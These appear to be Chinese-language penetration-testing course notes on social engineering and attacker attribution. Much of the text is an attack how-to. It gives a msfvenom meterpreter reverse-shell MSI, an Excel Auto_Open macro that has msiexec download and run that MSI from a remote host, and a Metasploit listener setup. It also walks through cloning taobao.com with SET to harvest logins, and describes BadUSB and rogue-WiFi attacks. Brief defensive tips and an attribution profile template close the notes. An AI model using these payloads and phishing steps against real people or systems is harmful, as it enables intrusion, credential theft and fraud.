九、社工&溯源

安全产品漏洞： https://www.cnvd.org.cn/flaw/typelist?typeId=32 

CMS系统漏洞： https://www.cnvd.org.cn/flaw/typelist?typeId=29

1. 社工概述

不是技术性攻击，利用的人类弱点，利用欺骗，操纵，诱骗

利用被授权的人（公司财务、公司人事，公司网络管理员，开发人员）

存在风险

技术漏洞 vs 人的漏洞；渗透 vs 社工

人的漏洞比系统技术的漏洞危害更大，82%漏洞来自人**

1.1 电信诈骗手段

社会工程学利用了人类多种弱点

1、好奇心
2、信任
3、恐惧
4、无知
5、疏忽

1.2 社工策略

2. 社工攻击流程

1、收集目标信息（人事、保安、运维……） 社交网站、冒充身份获取、社工库、远控

2、伪造身份与目标接触（求职者、维修工、同事）

3、编造谎言迷惑目标（发送邮件、连接网络、进 入机房）

4、展开攻击（接入网络、控制机器、窃取信息）

信息搜集

个人信息收集内容与方法 https://mp.weixin.qq.com/s/dt2yHvWDIcdpnC3ag5gXsw 

个人信息泄露查询 
https://monitor.firefox.com/
https://haveibeenpwned.com/ 

注册查询 https://www.reg007.com/ http://regbao.com/ 

阿里云实名认证接口 https://market.aliyun.com/products/57000002/cmapi025518.html

火狐自带的泄漏查询

https://monitor.firefox.com/

外网查泄漏

https://haveibeenpwned.com/

查询手机注册过的网站

https://www.reg007.com/
http://regbao.com/

3. 社工案例&工具

3.1 钓鱼邮件

1、获得邮箱地址或者账号密码
2、伪造发件人邮件地址（不一定能成功）
3、撰写有吸引力的主题 
4、撰写有说服力的内容
5、诱导点击或者下载

钓鱼邮件生成网站

https://emkei.cz/ 
postfix和gophish

3.2 msi宏文件

msfvenom生成msi宏文件

1、获得邮箱地址或者账号密码

利用kali生成一个宏病毒

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.132 lport=4444 -f msi -o hack.msi

新建excel文件，保存为xlsm

=EXEC("msiexec /q /I http://192.168.142.66/hack.msi") =HALT()

将第一行模式修改为：

Auto_Open

并Enter回车，自动运行宏。

office 宏病毒MSF监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.142.132
set lport 4444
run

3.3 钓鱼网站

1、注册类似域名；伪造子域名

2、仿冒界面

3、记录用户输入内容

kali工具 setoolkit

直接可以克隆一个网站

如果在其他操作系统中克隆，更换social-engineer地址即可
https://github.com/trustedsec/social-engineer-toolkit.git

3.4 SET克隆网站步骤

（1）开启kali

首先开启kali，打开root窗口

启动工具

setoolkit

工具设置注释

Social-Engineering Attacks——社工 
Website Attack Vectors——网站
Credential Harvester Attack Method——凭据
Site Cloner——站点克隆

（2）设置选择

我们先选社工工程学攻击（1回车）

然后选攻击网站（2）

选攻击网站的凭据（3）

克隆站点（2）

（3）输入克隆网站

直接默认回车，然后输入想要克隆的网页

https://www.taobao.com/

直接回车

克隆成功，查看克隆网站

假设此刻有用户输入登录信息

用户回车登录，就会在后台显示登录名和密码

3.5 badusb

可以监控键盘的操作

1、刻录代码

 https://store.arduino.cc/usa/arduino-leonardo-with-headers

2、扔下U盘

3、恶意代码自动运行

3.6 近源攻击

1、面试入职

2、在公司附近连接公司WiFi

3、无人机破解WiFi/制作钓鱼WiFi（fluxion）

可以制作一个同名的WiFi，一旦连上可以抓包

https://www.bilibili.com/read/cv21608887/

4、……

5、美女、金钱、送人情

4. 社工防范

1、身份确认：是这个人吗？有权限吗？

2、切勿轻易点击链接和打开文件

3、启用多重身份认证

4、运行杀毒软件；更新

5、不连接到不安全的WiFi

6、在社交网络中隐藏个人信息

7、安全培训；攻防演练

5. 溯源概述

通过可疑路经，确认攻击成员身份，完成攻击者画像

攻击者画像

姓名/ID：
攻击IP：
地理位置：
QQ:
IP地址所属公司：
IP地址关联域名：
邮箱：
手机号：
微信/微博/src/id证明：
人物照片：
跳板机（可选）：
关联攻击事件：

5.1 攻击源获取

1、获取哪些数据？

攻击者ip、域名、后门、攻击组件、webshell

2、通过什么方式去获取？

蜜罐、安全设备、钓鱼邮件、文件日志进程分析

溯源主要以蜜罐为主

5.2 安全设备

主要针对IP地址操作

5.3 钓鱼邮件

对邮件进行分析